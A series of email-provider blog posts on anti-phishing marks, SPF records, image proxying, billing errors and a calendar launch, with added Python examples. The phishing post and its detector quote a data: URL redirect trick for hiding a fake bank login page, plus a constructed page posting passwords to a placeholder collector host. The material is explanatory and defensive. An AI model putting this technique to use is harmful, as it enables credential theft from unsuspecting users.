New anti-phishing feature, all official FastMail emails have green tick mark

We’ve just rolled out a new feature that should help users identify official FastMail emails and avoid fake phishing emails.

All future official FastMail emails should now have a green tick next to them in the mailbox listing and when viewing the email/conversation. They look like this:

[Screenshot: Screen Shot 2014-10-14 at 10.14.37 pm]

[Screenshot: Screen Shot 2014-10-14 at 10.17.52 pm]

Users should be careful of any future emails that claim to be from FastMail that don’t have the green tick. These are almost certainly phishing emails that aim to steal your login details. Just report them as spam.

Note that the tick will only appear on future official FastMail emails, not existing ones. Also, it only appears in the current web interface, not in the classic web interface and not in external email clients (e.g. Outlook, Thunderbird, Mac Mail, etc.).

Posted in News. Comments Off

FastMail changelog update

The following changes have been rolled out to production:

  • When you use FastMail’s nameservers for your DNS, one of the default records we publish is an SPF record. Until now, we’ve published this as both a TXT DNS record type and an SPF DNS record type.
  • SPF DNS record types have been deprecated (http://tools.ietf.org/html/rfc7208#section-3.1) for a while, so we’ve now removed the SPF DNS record type and are only publishing TXT DNS record types.
  • This shouldn’t affect anyone, but we’ve put up this post as information for anyone experiencing an issue with ancient software or systems.
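A check a domain owner can run after a change like this, written here as an added example rather than FastMail's own tooling: given the records a zone publishes, confirm that exactly one v=spf1 policy exists as a TXT record, that no copy is left on the deprecated SPF RR type (type 99) that RFC 7208 section 3.1 retires, and that, while both still exist, they do not disagree. The record model and the zone contents are constructed for the demo; the hostnames are placeholders and the MX and include targets are not real records.

```python
from typing import List, NamedTuple


class Record(NamedTuple):
    """Minimal DNS record model; a real check would fill this from a resolver."""
    name: str
    rtype: str   # "TXT", "SPF" (the deprecated type 99), "MX", ...
    data: str


def spf_policies(records: List[Record], rtype: str) -> List[Record]:
    """Records of the given type whose data is an SPF version-1 policy."""
    return [r for r in records
            if r.rtype.upper() == rtype and r.data.lower().startswith("v=spf1")]


def check_spf_publication(records: List[Record]) -> List[str]:
    """Return findings about how a zone publishes SPF; an empty list means OK.

    RFC 7208 section 3.1 requires the policy to be a TXT record and says the
    separate SPF RR type is no longer used; RFC 7208 also makes a lookup that
    selects more than one policy record a permerror.
    """
    findings = []
    txt = spf_policies(records, "TXT")
    legacy = spf_policies(records, "SPF")
    if not txt:
        findings.append("no v=spf1 TXT record: receivers treat the domain as having no SPF policy")
    elif len(txt) > 1:
        findings.append("more than one v=spf1 TXT record: receivers return permerror")
    if legacy:
        findings.append("deprecated SPF RR type (type 99) still published; modern receivers ignore it")
    if txt and legacy and txt[0].data != legacy[0].data:
        findings.append("TXT and type-99 policies differ: old and new receivers evaluate different rules")
    return findings


# Constructed sample zones (hostnames are placeholders, not real records).
ZONE_BEFORE = [
    Record("example.com.", "TXT", "v=spf1 include:_spf.mailhost.example ?all"),
    Record("example.com.", "SPF", "v=spf1 include:_spf.mailhost.example ?all"),
    Record("example.com.", "MX", "10 mx.mailhost.example."),
]
ZONE_AFTER = [r for r in ZONE_BEFORE if r.rtype != "SPF"]
ZONE_DUPLICATED = ZONE_AFTER + [Record("example.com.", "TXT", "v=spf1 -all")]

if __name__ == "__main__":
    for label, zone in (("before", ZONE_BEFORE), ("after", ZONE_AFTER),
                        ("duplicated", ZONE_DUPLICATED)):
        print(label, check_spf_publication(zone) or "OK")
```

The "before" zone produces only the type-99 finding, the "after" zone is clean, and the duplicated zone shows the failure mode that matters most in practice: a second v=spf1 TXT record left behind by an old provider turns the whole policy into a permerror.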
Posted in Feature announcement. Comments Off

Better security and privacy through image proxying

Today we rolled out a feature that enhances your privacy and security when you use FastMail: all off-site images embedded in emails are now proxied through our servers. Instead of your web browser going out to the wider internet to fetch an image in an email, it will request it securely from our servers and we’ll fetch the image on your behalf. (The original email is never modified, so if you forward it or view it in an IMAP client, it will appear exactly as we received it.)

When your browser requests an image (or any other page) it sends all sorts of information to the web server, including your internet address (which reveals your rough location), the type and version of browser you’re using, and sometimes even tracking cookies and other information that can help identify you. While these things are a fundamental part of how the web works and are difficult to avoid, we know that many of our users don’t like this information to be sent without their knowledge. That’s why we’ve always had protection against this by requiring you to explicitly request that images be loaded for an email.

Now though, we’ve gone one step further. When an image is loaded, the request goes only to our servers, which then go and request the original image. The request comes from the server’s address, with a generic browser type and version and no information at all that identifies the original email or the user requesting it. The image server remains in the dark about where the request came from. That’s a big plus for your privacy.

The other advantage of our new approach is that it removes the possibility of mixed-content warnings appearing in your browser while reading your email. Every web user has had it drilled into them for years that they should look for the padlock icon to know if the site they’re looking at is secure:

[Image: happy-proxy (intact padlock icon)]

But when you view an email with an image served from an insecure site (as most image hosting sites are), the browser changes the padlock icon to look like this:

[Image: sad-proxy (mixed-content padlock icon)]

Since all images now come via our secure servers, the padlock will now always remain intact, giving you the confidence that no one is intercepting your data.

Edit: Clarified that the image server cannot see where the request came from. It may still be able to determine who the request came from (i.e. email address validation) if the image URL has some kind of tracking data in it. It’s still a marked improvement on not proxying at all, as it can’t be directly correlated with an internet address or other tracking data.
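The two halves of an image proxy described above, as an added example that is not FastMail's code: the renderer rewrites each off-site `<img src>` to an HTTPS URL on a proxy endpoint, and the proxy recovers the origin URL and fetches it with a generic browser identity and no cookies or referrer. The proxy URL carries an HMAC tag so the endpoint cannot be used as an open relay by anyone who can guess the URL format. The endpoint `imgproxy.example`, the key and the sample message are constructed for the demo. Note what this does not do: if the image URL itself contains a per-recipient token, the origin still learns that the message was opened, which is the caveat in the edit above.

```python
import base64
import hashlib
import hmac
import re
from typing import Optional
from urllib.parse import urlsplit

# Hypothetical proxy endpoint and a constructed demo key; in a deployment the key
# lives only on the server so that nobody else can mint valid proxy URLs.
PROXY_BASE = "https://imgproxy.example/img"
SECRET = b"constructed-demo-secret"

# Headers the proxy uses when it fetches on the reader's behalf: a generic
# browser identity and nothing that could identify the mailbox or the message.
FETCH_HEADERS = {
    "User-Agent": "Mozilla/5.0 (compatible; mail-image-proxy)",
    "Accept": "image/*",
    # deliberately absent: Cookie, Referer, Accept-Language, X-Forwarded-For
}


def _b64(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).decode().rstrip("=")


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def proxy_url(image_url: str, secret: bytes = SECRET) -> str:
    """Renderer side: turn an off-site image URL into a signed HTTPS proxy URL.

    The HMAC tag stops the endpoint being an open relay: only URLs the mail
    renderer itself produced will verify on the proxy side."""
    tag = hmac.new(secret, image_url.encode(), hashlib.sha256).digest()[:16]
    return f"{PROXY_BASE}/{_b64(tag)}/{_b64(image_url.encode())}"


def resolve_proxy_url(proxied: str, secret: bytes = SECRET) -> Optional[str]:
    """Proxy side: recover the origin URL, or None if the signature does not verify."""
    if not proxied.startswith(PROXY_BASE + "/"):
        return None
    try:
        tag_b64, url_b64 = proxied[len(PROXY_BASE) + 1:].split("/", 1)
        url = _unb64(url_b64).decode()
        tag = _unb64(tag_b64)
    except (ValueError, UnicodeDecodeError):
        return None
    expected = hmac.new(secret, url.encode(), hashlib.sha256).digest()[:16]
    if not hmac.compare_digest(tag, expected):
        return None
    if urlsplit(url).scheme not in ("http", "https"):
        return None   # never fetch file:, ftp: or other schemes on a reader's behalf
    return url


# Deliberately simple src matcher for the demo; a production renderer works on
# the parsed DOM rather than the raw HTML.
IMG_SRC = re.compile(r'(<img\b[^>]*?\bsrc=["\'])([^"\']+)(["\'])', re.IGNORECASE)


def rewrite_images(html: str, secret: bytes = SECRET) -> str:
    """Rewrite every http(s) <img src> to the proxy; cid: and data: images are
    part of the message itself and are left alone."""
    def repl(match):
        src = match.group(2)
        if urlsplit(src).scheme in ("http", "https"):
            return match.group(1) + proxy_url(src, secret) + match.group(3)
        return match.group(0)
    return IMG_SRC.sub(repl, html)


if __name__ == "__main__":
    # Constructed sample: a tracking pixel on a plain-http host, as in mass mailings.
    sample = '<p>Hello</p><img src="http://cdn.example/pixel.gif?u=123" alt=""><img src="cid:logo">'
    rewritten = rewrite_images(sample)
    print(rewritten)
    proxied = IMG_SRC.search(rewritten).group(2)
    print("proxy would fetch:", resolve_proxy_url(proxied), "with", FETCH_HEADERS)
```

Because the rewritten `src` is always `https://` on the mail host, the plain-http pixel no longer triggers the browser's mixed-content indicator; the browser only ever talks to the proxy, and the proxy is the only party that talks to `cdn.example`.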

Posted in Feature announcement, News. Comments Off

FastMail changelog update

The following changes have been rolled out to production:

  • New keyboard shortcut: ";" (semi-colon) opens the "More" menu of a message. You can then use arrow keys + enter to select an option. Use N/P to select a message before the last one in a conversation. More information on keyboard shortcuts is available in our documentation: https://www.fastmail.fm/help/receive/kbshortcuts.html
Posted in Feature announcement. Comments Off

Payment Issues

Recently there have been some problems with our payment processor.

One of these is that sometimes there is a significant delay in completing a transaction, so the funds are “reserved” but the transaction isn’t actually completed until a few weeks later.

The other problem was that a number of charges were made to some of our customers’ credit cards, in our name. The majority of these are USD 1.00 test charges that are used to verify that a card is valid. Normally we cancel these charges immediately and the charge doesn’t appear on the card statement. However the problem at our payment processor has resulted in some of these supposedly “cancelled” charges recently being applied to customer cards. A number of other charges which were supposed to be “cancelled” have also been processed. This was done in error and without any instructions from FastMail.

We are currently working with our payment processor to refund these erroneous payments. In some cases, the refunds are unable to be processed directly because the card has expired or been cancelled.

We may need to refund these charges via an alternative method, or, at the user’s option, instead credit the amount towards future FastMail renewals. We will be in touch with the affected customers once we have more information on the scope of the problem.

We would like to assure our users that we will make certain that all erroneous charges are corrected. This may take some time, so thanks for your patience.

Our apologies for any inconvenience or confusion. We will post more information as it becomes available.
- the FastMail team

Posted in Technical. Comments Off

New phishing trick, data: URLs to avoid forgery reporting

This is a technical post about a new and interesting phishing technique seen today. Regular FastMail users can skip this post.

We saw an interesting new phishing attempt today that uses a relatively novel technique to try and hide the source of the attack and avoid it being reported as a web forgery.

Firstly, the email itself looks reasonably well done (apart from the year in the subject being completely wrong); certainly it’s not the poor quality you often see. It looked like this (ANZ is an Australian bank):

[Image: phishing (screenshot of the email)]

Secondly, the email was sent using a compromised gmail account with a .edu address. In fact there were two separate emails, both from different compromised gmail .edu accounts. I imagine compromised gmail .edu accounts aren’t that easy to get, and this significantly reduced the chances of it being caught by any spam filter.

Thirdly, the phishing page itself is interesting in that it:

  1. Uses a standard link shortener for a redirect (http://ow.ly in this case)
  2. Which redirects to the phishing delivery page (a compromised page on http://zerra-performance-center.de)
  3. That page, however, rather than hosting the HTML phishing login page directly, does this:

<script type="text/javascript">
        window.location="data:text/html;base64,... base64 encoded version of HTML phishing login page ...";
</script>

That data: URL is itself the phishing page content, which includes links to real ANZ website logos to make it look as authentic as possible, but has a form submit action to a compromised page on http://lucinaracosta.com.br.

This approach is interesting because it makes it impossible to report this page as a forgery using the standard Firefox "Report Web Forgery" action because Firefox thinks it’s a data: URL. Neat trick that makes it harder to remove or block in the long run.

I’ve reported this issue as a Firefox bug: https://bugzilla.mozilla.org/show_bug.cgi?id=1032564
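From the defender's side, the practical consequence of the trick above is that the thing worth reporting and blocking is not the data: URL (which has no host) but the page that redirects into it and the host its form posts to. The following is an added example, not FastMail's scanner: it looks for a JavaScript assignment of a base64 `data:text/html` URL to the location, decodes the hidden document, and pulls out the form action hosts so a URL scanner or abuse report can name them. The sample landing page and the hosts `compromised-host.example` and `collector.example` are constructed for the demo.

```python
import base64
import re
from html.parser import HTMLParser
from typing import List
from urllib.parse import urlsplit

# JavaScript assignment of a base64 data:text/html URL to the location, the
# pattern in the post's example. A URL scanner would treat this as a signature.
DATA_URL_REDIRECT = re.compile(
    r'(?:window\.|document\.)?location(?:\.href)?\s*=\s*["\']'
    r'data:text/html;base64,([A-Za-z0-9+/=\s]+)["\']',
    re.IGNORECASE,
)


class FormActionCollector(HTMLParser):
    """Collect the action= target of every <form> in a document."""

    def __init__(self) -> None:
        super().__init__()
        self.actions: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "form":
            for name, value in attrs:
                if name.lower() == "action" and value:
                    self.actions.append(value)


def hidden_documents(page_html: str) -> List[str]:
    """Decode every base64 data: document the page redirects into."""
    docs = []
    for match in DATA_URL_REDIRECT.finditer(page_html):
        try:
            raw = base64.b64decode(re.sub(r"\s", "", match.group(1)), validate=True)
        except ValueError:
            continue   # not valid base64; skip rather than crash the scanner
        docs.append(raw.decode("utf-8", errors="replace"))
    return docs


def analyse_landing_page(landing_url: str, page_html: str) -> dict:
    """Report what can be blocked or reported: the landing host (which has a real
    URL) and the hosts the hidden page submits credentials to."""
    report = {
        "landing_host": urlsplit(landing_url).hostname,
        "uses_data_url_redirect": False,
        "credential_sink_hosts": [],
    }
    for doc in hidden_documents(page_html):
        report["uses_data_url_redirect"] = True
        collector = FormActionCollector()
        collector.feed(doc)
        for action in collector.actions:
            host = urlsplit(action).hostname
            if host and host not in report["credential_sink_hosts"]:
                report["credential_sink_hosts"].append(host)
    return report


# Constructed sample modelled on the post's description; hostnames are placeholders.
SAMPLE_LANDING_URL = "http://compromised-host.example/promo/index.html"
_HIDDEN_PAGE = (
    '<html><body><img src="https://bank.example/logo.png">'
    '<form method="post" action="http://collector.example/login.php">'
    '<input name="user"><input name="pass" type="password"></form></body></html>'
)
SAMPLE_LANDING_PAGE = (
    '<html><head><script type="text/javascript">\n'
    '        window.location="data:text/html;base64,'
    + base64.b64encode(_HIDDEN_PAGE.encode()).decode()
    + '";\n</script></head></html>'
)

if __name__ == "__main__":
    print(analyse_landing_page(SAMPLE_LANDING_URL, SAMPLE_LANDING_PAGE))
```

The report for the sample names `compromised-host.example` as the page to report and `collector.example` as the credential sink; both are ordinary http URLs that a browser's forgery-reporting flow and a blocklist can act on, which is exactly what the data: URL itself denies them.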

Posted in Technical. Comments Off

Announcing the FastMail Calendar

After 9 months of intense work, we’re very proud to announce a major new addition to FastMail. We’ve taken all the great things about FastMail’s email hosting and applied them to build an awesome new calendar. You get the same incredibly speedy and elegant web interface. The same robust, fully-redundant backend (with live off-shore replicas). The same power behind an easy-to-use interface.

Our new calendar is packed full of the features you need to stay organised:

  • Continuous scrolling, because life isn’t broken into months.
  • Two-way sync with your existing Google or iCloud calendars.
  • A great experience on mobile browsers – just like with email.
  • Real-time updates, so changes are displayed immediately on all devices.
  • Multiple time zone support.
  • Powerful sharing options for easy collaboration.

We could go on, but really you should just try it for yourself. Head over to https://www.fastmail.fm and log in to your account, or if you don’t yet have one you can sign up for a free 60-day trial. Alternatively, find out more about what our new calendar can do by exploring our documentation.

A major addition like this would often be added as a separate service, but we’re delighted to announce that the new calendar will be available at no extra cost for all our paying subscribers. Most accounts also get CalDAV access included as well for syncing with your favourite mobile calendar app. More information about which accounts have CalDAV access is available on our new pricing pages.

With contact synchronisation coming very soon now, we’re looking forward to meeting all your communication needs in one place.

We hope you enjoy using our new calendar as much as we’ve enjoyed building it. As always, we’d love to hear what you think! Please let us know via support, twitter, etc.

The FastMail Team

Posted in News. Comments Off